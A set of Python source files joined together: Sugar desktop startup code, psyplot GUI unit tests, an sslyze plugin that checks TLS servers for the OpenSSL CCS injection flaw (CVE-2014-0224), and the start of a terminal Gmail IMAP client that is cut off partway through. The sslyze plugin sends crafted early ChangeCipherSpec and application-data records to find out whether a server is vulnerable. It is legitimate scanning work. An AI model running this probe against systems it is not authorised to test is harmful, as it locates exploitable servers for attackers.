logging.debug('STARTUP: setup_frame_cb')
frame.get_view()
def setup_keyhandler_cb():
logging.debug('STARTUP: setup_keyhandler_cb')
keyhandler.setup(frame.get_view())
def setup_gesturehandler_cb():
logging.debug('STARTUP: setup_gesturehandler_cb')
gesturehandler.setup(frame.get_view())
def setup_cursortracker_cb():
logging.debug('STARTUP: setup_cursortracker_cb')
cursortracker.setup()
def setup_journal_cb():
logging.debug('STARTUP: setup_journal_cb')
journalactivity.start()
def setup_notification_service_cb():
notifications.init()
def setup_file_transfer_cb():
filetransfer.init()
def setup_window_manager():
logging.debug('STARTUP: window_manager')
if subprocess.call('metacity-message disable-keybindings',
shell=True):
logging.warning('Can not disable metacity keybindings')
if subprocess.call('metacity-message disable-mouse-button-modifiers',
shell=True):
logging.warning('Can not disable metacity mouse button modifiers')
def __window_manager_changed_cb(screen):
_check_for_window_manager(screen)
def _complete_desktop_startup():
launcher.setup()
GLib.idle_add(setup_frame_cb)
GLib.idle_add(setup_keyhandler_cb)
GLib.idle_add(setup_gesturehandler_cb)
GLib.idle_add(setup_journal_cb)
GLib.idle_add(setup_notification_service_cb)
GLib.idle_add(setup_file_transfer_cb)
GLib.timeout_add_seconds(600, updater.startup_periodic_update)
apisocket.start()
testrunner.check_environment()
def _check_for_window_manager(screen):
wm_name = screen.get_window_manager_name()
if wm_name is None:
return
screen.disconnect_by_func(__window_manager_changed_cb)
setup_window_manager()
global _window_manager_started
_window_manager_started = True
global _starting_desktop
if _starting_desktop:
_complete_desktop_startup()
def _start_window_manager():
global _metacity_process
settings = Gio.Settings.new('org.gnome.desktop.interface')
settings.set_string('cursor-theme', 'sugar')
_metacity_process = subprocess.Popen(['metacity', '--no-force-fullscreen'])
screen = Wnck.Screen.get_default()
screen.connect('window-manager-changed', __window_manager_changed_cb)
_check_for_window_manager(screen)
def _stop_window_manager():
global _metacity_process
_metacity_process.terminate()
def _begin_desktop_startup():
global _starting_desktop
_starting_desktop = True
UIService()
session_manager = get_session_manager()
session_manager.start()
# open homewindow before window_manager to let desktop appear fast
home_window = homewindow.get_instance()
home_window.show()
def __intro_window_done_cb(window):
_begin_desktop_startup()
global _window_manager_started
if _window_manager_started:
_complete_desktop_startup()
def cleanup_temporary_files():
try:
# Remove temporary files. See http://bugs.sugarlabs.org/ticket/1876
data_dir = os.path.join(env.get_profile_path(), 'data')
shutil.rmtree(data_dir, ignore_errors=True)
os.makedirs(data_dir)
except OSError, e:
# temporary files cleanup is not critical; it should not prevent
# sugar from starting if (for example) the disk is full or read-only.
print 'temporary files cleanup failed: %s' % e
def _migrate_journal_mimeregistry():
from gi.repository import GConf
client = GConf.Client.get_default()
# Now this isn't good
# keys in /desktop/sugar/journal/defaults are mime types
# which are of the sort text/plain
# so, GConf is thinking test is a directory and the key is plain
# while the key should be 'text/plain'
gconf_defaults_dir = '/desktop/sugar/journal/defaults'
entries = client.all_entries(gconf_defaults_dir)
for directory in client.all_dirs(gconf_defaults_dir):
entries.extend(client.all_entries(directory))
prefix = gconf_defaults_dir + '/'
prefix_length = len(prefix)
gconf_defaults = {}
for entry in entries:
key = entry.get_key()
key = key[prefix_length:]
# entry.get_value().get_string() causes sugar to crash later
# not on the call, but after some random time
# was impossible to debug (almost impossible)
value = entry.value.get_string()
gconf_defaults[key] = value
variant = GLib.Variant('a{ss}', gconf_defaults)
settings = Gio.Settings('org.sugarlabs.journal')
settings.set_value('mime-registry', variant)
def _migrate_homeviews_settings():
from gi.repository import GConf
client = GConf.Client.get_default()
# Merge several keys into one... yay!
options = client.get('/desktop/sugar/desktop/view-icons')
gconf_view_icons = []
if options:
gconf_view_icons = [gval.get_string() for gval in options.get_list()]
# assume view-icons is the leading key
number_of_views = len(gconf_view_icons)
layouts = []
prefix = '/desktop/sugar/desktop/favorites_layout'
entries = client.all_entries('/desktop/sugar/desktop')
for entry in entries:
key = entry.get_key()
if key.startswith(prefix):
# entry.get_value().get_string() causes sugar to crash later
# not on the call, but after some random time
# was impossible to debug (almost impossible)
value = entry.value.get_string()
layouts.append((key, value))
layouts.sort()
gconf_layouts = [layout[1] for layout in layouts][:number_of_views]
while len(gconf_layouts) < number_of_views:
gconf_layouts.append('ring-layout')
options = client.get('/desktop/sugar/desktop/favorite-icons')
gconf_fav_icons = []
if options:
gconf_fav_icons = [gval.get_string() for gval in options.get_list()]
gconf_fav_icons = gconf_fav_icons[:number_of_views]
while len(gconf_fav_icons) < number_of_views:
gconf_fav_icons.append('emblem-favorite')
homeviews = []
for i, view_icon in enumerate(gconf_view_icons):
homeviews.append({'view-icon': view_icon, 'layout': gconf_layouts[i],
'favorite-icon': gconf_fav_icons[i]})
variant = GLib.Variant('aa{ss}', homeviews)
settings = Gio.Settings('org.sugarlabs.desktop')
settings.set_value('homeviews', variant)
def _migrate_gconf_to_gsettings():
try:
subprocess.call('gsettings-data-convert')
except subprocess.CalledProcessError:
logging.error('Unable to convert data.')
settings = Gio.Settings('org.sugarlabs')
migrated = settings.get_boolean('gsettings-migrated')
if not migrated:
_migrate_journal_mimeregistry()
_migrate_homeviews_settings()
settings.set_boolean('gsettings-migrated', True)
def setup_locale():
# NOTE: This needs to happen early because some modules register
# translatable strings in the module scope.
gettext.bindtextdomain('sugar', config.locale_path)
gettext.bindtextdomain('sugar-toolkit-gtk3', config.locale_path)
gettext.textdomain('sugar')
settings = Gio.Settings('org.sugarlabs.date')
timezone = settings.get_string('timezone')
if timezone is not None and timezone:
os.environ['TZ'] = timezone
def setup_fonts():
settings = Gio.Settings('org.sugarlabs.font')
face = settings.get_string('default-face')
size = settings.get_double('default-size')
settings = Gtk.Settings.get_default()
settings.set_property("gtk-font-name", "%s %f" % (face, size))
def setup_theme():
settings = Gtk.Settings.get_default()
sugar_theme = 'sugar-72'
if 'SUGAR_SCALING' in os.environ:
if os.environ['SUGAR_SCALING'] == '100':
sugar_theme = 'sugar-100'
settings.set_property('gtk-theme-name', sugar_theme)
settings.set_property('gtk-icon-theme-name', 'sugar')
icons_path = os.path.join(config.data_path, 'icons')
Gtk.IconTheme.get_default().append_search_path(icons_path)
def _start_intro(start_on_age_page=False):
window = IntroWindow(start_on_age_page=start_on_age_page)
window.connect('done', __intro_window_done_cb)
window.show()
def _check_profile():
if intro.check_profile():
return True
profile_name = os.environ.get("SUGAR_PROFILE_NAME", None)
if profile_name is not None:
create_profile_with_nickname(profile_name)
return True
return False
def _check_group_label():
return intro.check_group_label()
def main():
# This can be removed once pygobject-3.10 is a requirement.
# https://bugzilla.gnome.org/show_bug.cgi?id=686914
GLib.threads_init()
Gst.init(sys.argv)
_migrate_gconf_to_gsettings()
cleanup_temporary_files()
_start_window_manager()
setup_locale()
setup_fonts()
setup_theme()
# this must be added early, so that it executes and unfreezes the screen
# even when we initially get blocked on the intro screen
GLib.idle_add(unfreeze_dcon_cb)
GLib.idle_add(setup_cursortracker_cb)
sound.restore()
keyboard.setup()
sys.path.append(config.ext_path)
if not _check_profile():
_start_intro()
elif not _check_group_label():
_start_intro(start_on_age_page=True)
else:
_begin_desktop_startup()
try:
Gtk.main()
except KeyboardInterrupt:
print 'Ctrl+C pressed, exiting...'
_stop_window_manager()
main()
|
puneetgkaur/backup_sugar_shell_for_cordova
|
src/jarabe/main.py
|
Python
|
gpl-2.0
| 11,951
|
# -*- coding: utf-8 -*-
"""Skript to test the InProcessShell that is used in the psyplot gui"""
import sys
import six
import unittest
from itertools import chain
import _base_testing as bt
import psyplot.project as psy
from psyplot.compat.pycompat import range
from psyplot_gui.compat.qtcompat import (
QTest, Qt, QStyleOptionViewItem, QWidget, QValidator, QtGui, QtCore,
asstring)
class PlotCreatorTest(bt.PsyPlotGuiTestCase):
"""Tests concerning the plot creator"""
def setUp(self):
super(PlotCreatorTest, self).setUp()
self.window.new_plots()
self.pc = self.window.plot_creator
def tearDown(self):
if getattr(self.pc, 'ds', None) is not None:
self.pc.ds.close()
# make sure the plot creator is closed completely
self.pc.close()
del self.pc
super(PlotCreatorTest, self).tearDown()
def test_load_external_file(self):
"""Test whether an external netCDF file can be loaded"""
fname = self.get_file('test-t2m-u-v.nc')
self.pc.open_dataset([fname])
vtab = self.pc.variables_table
ds = psy.open_dataset(fname)
self.assertIn(fname, self.pc.ds_combo.currentText())
self.assertEqual(
{asstring(vtab.item(irow, 0).text()) for irow in range(
vtab.rowCount())},
set(ds.variables) - set(ds.coords))
ds.close()
def test_load_from_console(self):
"""Test whether a dataset can be loaded that is defined in the
console"""
fname = self.get_file('test-t2m-u-v.nc')
if sys.platform == 'win32':
fname = fname.replace('\\', '\\\\')
self.window.console.execute(
"ds = psy.open_dataset('%s')" % fname)
vtab = self.pc.variables_table
ds = psy.open_dataset(self.get_file('test-t2m-u-v.nc'))
self.pc.bt_get_ds.get_from_shell('ds')
self.assertIn('ds', self.pc.ds_combo.currentText())
self.assertEqual(
{asstring(vtab.item(irow, 0).text()) for irow in range(
vtab.rowCount())},
set(ds.variables) - set(ds.coords))
ds.close()
self.window.console.execute("ds.close()")
def test_plusplus(self):
"""Test the add all button"""
# loag a dataset
self.test_load_external_file()
QTest.mouseClick(self.pc.bt_add_all, Qt.LeftButton)
atab = self.pc.array_table
vtab = self.pc.variables_table
self.assertEqual(
[asstring(atab.item(irow, 0).text()) for irow in range(
atab.rowCount())],
[asstring(vtab.item(irow, 0).text()) for irow in range(
vtab.rowCount())])
def test_minusminus(self):
"""Test the remove all button"""
self.test_plusplus()
QTest.mouseClick(self.pc.bt_remove_all, Qt.LeftButton)
self.assertEqual(self.pc.array_table.rowCount(), 0)
def test_plus(self):
"""Test the add button"""
self.test_load_external_file()
vtab = self.pc.variables_table
atab = self.pc.array_table
nvar = vtab.rowCount()
rows = [nvar - 2, nvar - 1]
for row in rows:
vtab.item(row, 0).setSelected(True)
QTest.mouseClick(self.pc.bt_add, Qt.LeftButton)
self.assertEqual(
[asstring(atab.item(irow, 0).text()) for irow in range(
atab.rowCount())],
[asstring(vtab.item(irow, 0).text()) for irow in rows])
def test_minus(self):
"""Test the minus button"""
self.test_plusplus()
vtab = self.pc.variables_table
atab = self.pc.array_table
nvar = atab.rowCount()
rows = [nvar - 2, nvar - 1]
for row in rows:
atab.item(row, 0).setSelected(True)
QTest.mouseClick(self.pc.bt_remove, Qt.LeftButton)
variables = [asstring(vtab.item(row, 0).text())
for row in range(vtab.rowCount()) if row not in rows]
self.assertEqual(
[asstring(atab.item(irow, 0).text()) for irow in range(
atab.rowCount())],
variables)
def test_update_with_dims(self):
"""Test the update with the given dimensions"""
self.test_plusplus()
atab = self.pc.array_table
atab.selectAll()
atab.update_selected(dims={'time': '3'})
icol = len(atab.desc_cols) + atab.dims.index('time')
vars3d = {var for var, varo in atab.get_ds().variables.items()
if 'time' in varo.dims}
for irow in range(atab.rowCount()):
vname = atab.item(irow, atab.var_col).text()
if vname in vars3d:
item = atab.item(irow, icol)
self.assertEqual(
item.text(), '3',
msg='Wrong time value %s in row %s' % (
item.text(), irow))
def test_add_subplots(self):
"""Test the add subplots button"""
from math import ceil
import matplotlib.pyplot as plt
self.test_load_external_file()
self.test_plusplus()
self.pc.cols_axis_edit.setText('2')
self.pc.rows_axis_edit.setText('2')
self.pc.max_axis_edit.setText('3')
QTest.mouseClick(self.pc.bt_add_axes, Qt.LeftButton)
nvar = self.pc.array_table.rowCount()
nfigs = int(ceil(nvar / 3.))
# create the subplots
axes = self.pc.array_table.axes
self.assertEqual([ax.numCols for ax in axes], [2] * nvar)
self.assertEqual([ax.numRows for ax in axes], [2] * nvar)
rows = [0, 0, 1] * nfigs
cols = [0, 1, 0] * nfigs
self.assertEqual([ax.rowNum for ax in axes], rows)
self.assertEqual([ax.colNum for ax in axes], cols)
fig_nums = list(chain(*([i] * 3 for i in range(1, nfigs + 1))))
self.assertEqual([ax.get_figure().number for ax in axes], fig_nums)
plt.close('all')
def test_add_single_subplots(self):
"""Test the add single subplot button"""
import matplotlib.pyplot as plt
self.test_load_external_file()
self.test_plusplus()
self.pc.cols_axis_edit.setText('2')
self.pc.rows_axis_edit.setText('2')
self.pc.row_axis_edit.setText('1')
self.pc.col_axis_edit.setText('2')
self.pc.array_table.selectAll()
QTest.mouseClick(self.pc.bt_add_single_axes, Qt.LeftButton)
nvar = self.pc.array_table.rowCount()
# create the subplots
axes = self.pc.array_table.axes
# test rows, cols and figure numbers
self.assertEqual([ax.numCols for ax in axes], [2] * nvar)
self.assertEqual([ax.numRows for ax in axes], [2] * nvar)
self.assertEqual([ax.rowNum for ax in axes], [0] * nvar)
self.assertEqual([ax.colNum for ax in axes], [1] * nvar)
self.assertEqual([ax.get_figure().number for ax in axes], list(
range(1, nvar + 1)))
plt.close('all')
def test_axescreator_subplots(self):
"""Test the :class:`psyplot_gui.plot_creator.SubplotCreator`"""
import matplotlib.pyplot as plt
from psyplot_gui.plot_creator import AxesCreatorCollection
# load dataset
self.test_load_external_file()
# create arrays
self.test_plusplus()
# use all items
atab = self.pc.array_table
items = [atab.item(i, atab.axes_col) for i in range(atab.rowCount())]
# create the widget to select the subplots
ac = AxesCreatorCollection('subplot')
w = ac.tb.currentWidget()
w.fig_edit.setText('')
w.cols_edit.setText('2')
w.rows_edit.setText('2')
w.num1_edit.setText('2')
w.num2_edit.setText('2')
ac.okpressed.connect(lambda it: atab._change_axes(items, it))
QTest.mouseClick(ac.bt_ok, Qt.LeftButton)
nvar = self.pc.array_table.rowCount()
# create the subplots
axes = self.pc.array_table.axes
# test rows, cols and figure numbers
self.assertEqual([ax.numCols for ax in axes], [2] * nvar)
self.assertEqual([ax.numRows for ax in axes], [2] * nvar)
self.assertEqual([ax.rowNum for ax in axes], [0] * nvar)
self.assertEqual([ax.colNum for ax in axes], [1] * nvar)
self.assertEqual([ax.get_figure().number for ax in axes], list(
range(1, nvar + 1)))
# close figures
plt.close('all')
def test_axescreator_axes(self):
"""Test the :class:`psyplot_gui.plot_creator.AxesCreator`"""
import matplotlib.pyplot as plt
from psyplot_gui.plot_creator import AxesCreatorCollection
# load dataset
self.test_load_external_file()
# create arrays
self.test_plusplus()
# use all items
atab = self.pc.array_table
items = [atab.item(i, atab.axes_col) for i in range(atab.rowCount())]
# create the widget to select the subplots
ac = AxesCreatorCollection('axes')
w = ac.tb.currentWidget()
w.fig_edit.setText('')
w.x0_edit.setText('0.3')
w.y0_edit.setText('0.4')
w.x1_edit.setText('0.7')
w.y1_edit.setText('0.8')
ac.okpressed.connect(lambda it: atab._change_axes(items, it))
QTest.mouseClick(ac.bt_ok, Qt.LeftButton)
nvar = self.pc.array_table.rowCount()
# create the subplots
axes = self.pc.array_table.axes
boxes = [ax.get_position() for ax in axes]
# test rows, cols and figure numbers
self.assertEqual([box.x0 for box in boxes], [0.3] * nvar)
self.assertEqual([box.y0 for box in boxes], [0.4] * nvar)
self.assertEqual([box.x1 for box in boxes], [0.7] * nvar)
self.assertEqual([box.y1 for box in boxes], [0.8] * nvar)
self.assertEqual([ax.get_figure().number for ax in axes], list(
range(1, nvar + 1)))
# close figures
plt.close('all')
def test_axescreator_select(self):
"""Test the :class:`psyplot_gui.plot_creator.AxesSelector`"""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.backend_bases import MouseEvent, PickEvent
from psyplot_gui.plot_creator import AxesCreatorCollection
# load dataset
self.test_load_external_file()
# create arrays
self.test_plusplus()
# use all items
atab = self.pc.array_table
items = [atab.item(i, atab.axes_col) for i in range(2)]
# create the widget to select the subplots
ax1 = plt.axes([0.3, 0.4, 0.6, 0.3])
plt.figure()
ax2 = plt.subplot(211)
ac = AxesCreatorCollection('choose')
w = ac.tb.currentWidget()
fig = ax1.get_figure()
mouseevent1 = MouseEvent(
'button_release_event', fig.canvas,
*np.mean(ax1.get_position().get_points().T, axis=1))
w.get_picked_ax(PickEvent('pick', fig.canvas, mouseevent1, artist=ax1))
fig = ax2.get_figure()
mouseevent2 = MouseEvent(
'button_release_event', ax2.get_figure().canvas,
*np.mean(ax2.get_position().get_points().T, axis=1))
w.get_picked_ax(PickEvent('pick', fig.canvas, mouseevent2, artist=ax2))
ac.okpressed.connect(lambda it: atab._change_axes(items, it))
QTest.mouseClick(ac.bt_ok, Qt.LeftButton)
# create the subplots
axes = self.pc.array_table.axes
# check them
self.assertIs(axes[0], ax1)
self.assertIs(axes[1], ax2)
# close figures
plt.close('all')
def test_arrayname_validator(self):
"""Test the :class:`psyplot_gui.plot_creator.ArrayNameValidator`"""
# open dataset
fname = self.get_file('test-t2m-u-v.nc')
ds = psy.open_dataset(fname)
self.pc.bt_get_ds.get_from_shell(ds)
# add data arrays
QTest.mouseClick(self.pc.bt_add_all, Qt.LeftButton)
# get names
atab = self.pc.array_table
names = atab.current_names
# get itemdelegate
item_delegate = atab.itemDelegateForColumn(atab.arr_col)
# create editor and validator
widget = QWidget()
option = QStyleOptionViewItem()
index = atab.indexFromItem(atab.item(0, atab.arr_col))
editor = item_delegate.createEditor(widget, option, index)
validator = editor.validator()
# check validation
self.assertEqual(validator.validate(names[1], len(names[1]))[0],
validator.Intermediate)
self.assertEqual(validator.validate('dummy', 5)[0],
validator.Acceptable)
self.assertNotIn(validator.fixup(names[1]), names)
ds.close()
def test_variablename_validator(self):
"""Test the :class:`psyplot_gui.plot_creator.VariableItemDelegate`"""
# open dataset
try:
from psyplot_gui.compat.qtcompat import QString
except ImportError:
QString = six.text_type
fname = self.get_file('test-t2m-u-v.nc')
ds = psy.open_dataset(fname)
self.pc.bt_get_ds.get_from_shell(ds)
# add data arrays
QTest.mouseClick(self.pc.bt_add_all, Qt.LeftButton)
# get names
atab = self.pc.array_table
names = sorted(list(set(ds.variables).difference(ds.coords)))
# get itemdelegate
item_delegate = atab.itemDelegateForColumn(atab.var_col)
# create editor and validator
widget = QWidget()
option = QStyleOptionViewItem()
index = atab.indexFromItem(atab.item(0, atab.arr_col))
editor = item_delegate.createEditor(widget, option, index)
validator = editor.validator()
# check validation
self.assertEqual(validator.validate(QString('dummy'), 5)[0],
QValidator.Invalid)
self.assertEqual(validator.validate(QString(names[0]),
len(names[0]))[0],
QValidator.Acceptable)
self.assertEqual(validator.validate(QString(names[0])[:2], 2)[0],
QValidator.Intermediate)
s = atab.sep.join(names)
self.assertEqual(validator.validate(QString(s), len(s))[0],
QValidator.Acceptable)
self.assertEqual(
validator.validate(
QString(s[:3] + 'dummy' + s[3:]), len(s) + 5)[0],
QValidator.Invalid)
ds.close()
def test_drag_drop(self):
"""Test the drag and drop of the
:class:`psyplot_gui.plot_creator.ArrayTable`"""
self.pc.show()
# XXX Try to use directly the dropEvent method by setting the source of
# the event!
point = QtCore.QPoint(0, 0)
data = QtCore.QMimeData()
event = QtGui.QDropEvent(point, Qt.MoveAction, data, Qt.LeftButton,
Qt.NoModifier, QtCore.QEvent.Drop)
# open dataset
fname = self.get_file('test-t2m-u-v.nc')
ds = psy.open_dataset(fname)
self.pc.bt_get_ds.get_from_shell(ds)
# add data arrays
QTest.mouseClick(self.pc.bt_add_all, Qt.LeftButton)
# move rows
atab = self.pc.array_table
old = list(atab.arr_names_dict.items())
atab.selectRow(2)
atab.dropOn(event)
resorted = [old[i] for i in [2, 0, 1] + list(range(3, len(old)))]
self.assertEqual(list(atab.arr_names_dict.items()), resorted,
msg="Rows not moved correctly!")
ds.close()
if __name__ == '__main__':
unittest.main()
|
Chilipp/psyplot_gui
|
tests/test_plot_creator.py
|
Python
|
gpl-2.0
| 15,647
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import socket
import types
from xml.etree.ElementTree import Element
from nassl._nassl import WantReadError
from sslyze.plugins import plugin_base
from sslyze.plugins.plugin_base import PluginScanResult
from sslyze.server_connectivity import ServerConnectivityInfo
from tls_parser.alert_protocol import TlsAlertRecord
from tls_parser.application_data_protocol import TlsApplicationDataRecord
from tls_parser.change_cipher_spec_protocol import TlsChangeCipherSpecRecord
from tls_parser.exceptions import NotEnoughData
from tls_parser.handshake_protocol import TlsHandshakeRecord, TlsServerHelloDoneRecord
from tls_parser.parser import TlsRecordParser
from tls_parser.tls_version import TlsVersionEnum
class OpenSslCcsInjectionScanCommand(plugin_base.PluginScanCommand):
"""Test the server(s) for the OpenSSL CCS injection vulnerability (CVE-2014-0224).
"""
@classmethod
def get_cli_argument(cls):
return 'openssl_ccs'
class OpenSslCcsInjectionPlugin(plugin_base.Plugin):
"""Test the server(s) for the OpenSSL CCS injection vulnerability (CVE-2014-0224).
"""
@classmethod
def get_available_commands(cls):
return [OpenSslCcsInjectionScanCommand]
def process_task(self, server_info, scan_command):
# type: (ServerConnectivityInfo, OpenSslCcsInjectionScanCommand) -> OpenSslCcsInjectionScanResult
ssl_connection = server_info.get_preconfigured_ssl_connection()
# Replace nassl.sslClient.do_handshake() with a CCS checking SSL handshake so that all the SSLyze options
# (startTLS, proxy, etc.) still work
ssl_connection.do_handshake = types.MethodType(do_handshake_with_ccs_injection, ssl_connection)
is_vulnerable = False
try:
# Start the SSL handshake
ssl_connection.connect()
except VulnerableToCcsInjection:
# The test was completed and the server is vulnerable
is_vulnerable = True
except NotVulnerableToCcsInjection:
# The test was completed and the server is NOT vulnerable
pass
finally:
ssl_connection.close()
return OpenSslCcsInjectionScanResult(server_info, scan_command, is_vulnerable)
class VulnerableToCcsInjection(Exception):
"""Exception to raise during the handshake to hijack the flow and test for CCS.
"""
class NotVulnerableToCcsInjection(Exception):
"""Exception to raise during the handshake to hijack the flow and test for CCS.
"""
def do_handshake_with_ccs_injection(self):
"""Modified do_handshake() to send a CCS injection payload and return the result.
"""
try:
# Start the handshake using nassl - will throw WantReadError right away
self._ssl.do_handshake()
except WantReadError:
# Send the Client Hello
len_to_read = self._network_bio.pending()
while len_to_read:
# Get the data from the SSL engine
handshake_data_out = self._network_bio.read(len_to_read)
# Send it to the peer
self._sock.send(handshake_data_out)
len_to_read = self._network_bio.pending()
# Retrieve the server's response - directly read the underlying network socket
# Retrieve data until we get to the ServerHelloDone
# The server may send back a ServerHello, an Alert or a CertificateRequest first
did_receive_hello_done = False
remaining_bytes = b''
while not did_receive_hello_done:
try:
tls_record, len_consumed = TlsRecordParser.parse_bytes(remaining_bytes)
remaining_bytes = remaining_bytes[len_consumed::]
except NotEnoughData:
# Try to get more data
raw_ssl_bytes = self._sock.recv(16381)
if not raw_ssl_bytes:
# No data?
break
remaining_bytes = remaining_bytes + raw_ssl_bytes
continue
if isinstance(tls_record, TlsServerHelloDoneRecord):
did_receive_hello_done = True
elif isinstance(tls_record, TlsHandshakeRecord):
# Could be a ServerHello, a Certificate or a CertificateRequest if the server requires client auth
pass
elif isinstance(tls_record, TlsAlertRecord):
# Server returned a TLS alert
break
else:
raise ValueError('Unknown record? Type {}'.format(tls_record.header.type))
if did_receive_hello_done:
# Send an early CCS record - this should be rejected by the server
payload = TlsChangeCipherSpecRecord.from_parameters(
tls_version=TlsVersionEnum[self._ssl_version.name]).to_bytes()
self._sock.send(payload)
# Send an early application data record which should be ignored by the server
app_data_record = TlsApplicationDataRecord.from_parameters(tls_version=TlsVersionEnum[self._ssl_version.name],
application_data=b'\x00\x00')
self._sock.send(app_data_record.to_bytes())
# Check if an alert was sent back
while True:
try:
tls_record, len_consumed = TlsRecordParser.parse_bytes(remaining_bytes)
remaining_bytes = remaining_bytes[len_consumed::]
except socket.error:
# Server closed the connection after receiving the CCS payload
raise NotVulnerableToCcsInjection()
except NotEnoughData:
# Try to get more data
raw_ssl_bytes = self._sock.recv(16381)
if not raw_ssl_bytes:
# No data?
raise NotVulnerableToCcsInjection()
remaining_bytes = remaining_bytes + raw_ssl_bytes
continue
if isinstance(tls_record, TlsAlertRecord):
# Server returned a TLS alert but which one?
if tls_record.subprotocol_message.alert_description == 0x14:
# BAD_RECORD_MAC: This means that the server actually tried to decrypt our early application data
# record instead of ignoring it; server is vulnerable
raise VulnerableToCcsInjection()
# Any other alert means that the server rejected the early CCS record
raise NotVulnerableToCcsInjection()
else:
break
raise NotVulnerableToCcsInjection()
class OpenSslCcsInjectionScanResult(PluginScanResult):
"""The result of running an OpenSslCcsInjectionScanCommand on a specific server.
Attributes:
is_vulnerable_to_ccs_injection (bool): True if the server is vulnerable to OpenSSL's CCS injection issue.
"""
COMMAND_TITLE = 'OpenSSL CCS Injection'
def __init__(self, server_info, scan_command, is_vulnerable_to_ccs_injection):
# type: (ServerConnectivityInfo, OpenSslCcsInjectionScanCommand, bool) -> None
super(OpenSslCcsInjectionScanResult, self).__init__(server_info, scan_command)
self.is_vulnerable_to_ccs_injection = is_vulnerable_to_ccs_injection
def as_xml(self):
result_xml = Element(self.scan_command.get_cli_argument(), title=self.COMMAND_TITLE)
result_xml.append(Element('openSslCcsInjection',
attrib={'isVulnerable': str(self.is_vulnerable_to_ccs_injection)}))
return result_xml
def as_text(self):
result_txt = [self._format_title(self.COMMAND_TITLE)]
ccs_text = 'VULNERABLE - Server is vulnerable to OpenSSL CCS injection' \
if self.is_vulnerable_to_ccs_injection \
else 'OK - Not vulnerable to OpenSSL CCS injection'
result_txt.append(self._format_field('', ccs_text))
return result_txt
|
krount/sslyze
|
sslyze/plugins/openssl_ccs_injection_plugin.py
|
Python
|
gpl-2.0
| 7,894
|
# Vatsal Shah
# ECE-C433 Mini-Project 2
# gmailPy - A terminal gmail client
# Tested on Python 2.7.3
# imapclient is not a part of the standard python library
# install using sudo pip install imapclient
import getpass
from imapclient import IMAPClient
import operator
import email
import optparse
import sys
class gmailPy(object):
def __init__(self):
self.IMAP_SERVER = 'imap.gmail.com'
self.ssl = True
self.myIMAPc = None
self.response = None
self.folders = []
def login(self, username, password):
self.myIMAPc = IMAPClient(self.IMAP_SERVER, ssl=self.ssl)
self.myIMAPc.login(username, password)
# Returns a list of all the folders for a particular account
def get_folders(self):
self.response = self.myIMAPc.list_folders()
for item in self.response:
self.folders.append(item[2].strip('u'))
return self.folders
# Returns the total number of messages in a folder
def get_mail_count(self, folder='Inbox'):
self.response = self.myIMAPc.select_folder(folder, True)
return self.response['EXISTS']
# Method to delete messages based on their size
def delete_bigmail(self, folder='Inbox'):
self.myIMAPc.select_folder(folder, False)
# Gets all the message ids of the messages which are not deleted in the folder
messages = self.myIMAPc.search(['NOT DELETED'])
print "%d messages that aren't deleted" % len(messages)
if len(messages) > 0:
print "You can exit by entering 0 or pressing CTRL+C \n"
else: print "There are no messages in the folder"
# Gets the message sizes for all the message ids returned in previous step
# Note: Just sends one request for all message ids with a return time < 10 ms
self.response = self.myIMAPc.fetch(messages, ['RFC822.SIZE'])
# Sorts the dictionary returned by fetch by size in descending order
sorted_response = sorted(self.response.iteritems(), key=operator.itemgetter(1), reverse=True)
count = 1
try:
for item in sorted_response:
# Gets the biggest message including headers, body, etc.
big_message = self.myIMAPc.fetch(item[0], ['RFC822'])
for msgid, data in big_message.iteritems():
msg_string = data['RFC822']
# Parses the message string using email library
msg = email.message_from_string(msg_string)
val = dict(self.response[msgid])['RFC822.SIZE']
print 'ID %d: From: %s Date: %s' % (msgid, msg['From'], msg['date'])
print 'To: %s' % (msg['To'])
print 'Subject: %s' % (msg['Subject'])
print 'Size: %d bytes \n' % (val)
user_del = raw_input("Do you want to delete this message?(Y/N): ")
if user_del == 'Y':
self.delete_message(msgid)
if count == len(sorted_response):
print "There are no more messages"
else:
print "\nMoving on to the next biggest message >>> \n"
elif user_del == '0':
print "Program exiting"
sys.exit()
else:
if count == len(sorted_response):
print "There are no more messages"
else:
print "\nMoving on to the next biggest message >>> \n"
count += 1
except KeyboardInterrupt:
print "Program exiting"
sys.exit()
# Method to delete messages based on their size with a search criteria
def delete_bigmail_search(self, folder='Inbox', command='', criteria=''):
self.myIMAPc.select_folder(folder, False)
# Gets all the message ids from the server based on the search criteria
messages = self.myIMAPc.search('%s "%s"' % (command, criteria))
print "%d messages that match --> %s: %s" % (len(messages), command, criteria)
if len(messages) > 0:
print "You can exit by entering 0 or pressing CTRL+C \n"
else: print "There are no messages in that matched your search criteria"
# Gets the message sizes for all the message ids returned in previous step
# Note: Just sends one request for all message ids with a return time < 10 ms
self.response = self.myIMAPc.fetch(messages, ['RFC822.SIZE'])
# Sorts the messages in decending order of their sizes
sorted_response = sorted(self.response.iteritems(), key=operator.itemgetter(1), reverse=True)
count = 1
try:
for item in sorted_response:
# Gets the entire content for the biggest message identified
big_message = self.myIMAPc.fetch(item[0], ['RFC822'])
for msgid, data in big_message.iteritems():
msg_string = data['RFC822']
msg = email.message_from_string(msg_string)
val = dict(self.response[msgid])['RFC822.SIZE']
print 'ID %d: From: %s Date: %s' % (msgid, msg['From'], msg['date'])
print 'To: %s' % (msg['To'])
print 'Subject: %s' % (msg['Subject'])
print 'Size: %d bytes \n' % (val)
user_del = raw_input("Do you want to delete this message?(Y/N): ")
if user_del == 'Y':
self.delete_message(msgid)
if count == len(sorted_response):
print "There are no more messages"
else:
print "\nMoving on to the next biggest message >>> \n"
elif user_del == '0':
print "Program exiting"
sys.exit()
else:
if count == len(sorted_response):
print "There are no more messages"
else:
print "\nMoving on to the next biggest message >>> \n"
count += 1
except KeyboardInterrupt:
print "Program exiting"
sys.exit()
# Deletes a message in the current folder based on msg id
def delete_message(self, id):
try:
self.myIMAPc.delete_messages([id])
self.myIMAPc.expunge()
print "Message deleted"
except IMAPClient.Error as err:
print "Message deletion failed"
print err
# Renames a folder
def rename_folder(self, oldfolder, newfolder):
try:
self.myIMAPc.rename_folder(oldfolder, newfolder)
print "Folder %s renamed to %s" % (oldfolder, newfolder)
except IMAPClient.Error as err:
print "Folder renaming failed"
print err
# Creates a new folder
def create_folder(self, folder):
try:
self.myIMAPc.create_folder(folder)
print "New folder %s created" % folder
except IMAPClient.Error as err:
print "Folder creation failed"
print err
# Deletes a folder
def delete_folder(self, folder):
try:
self.myIMAPc.delete_folder(folder)
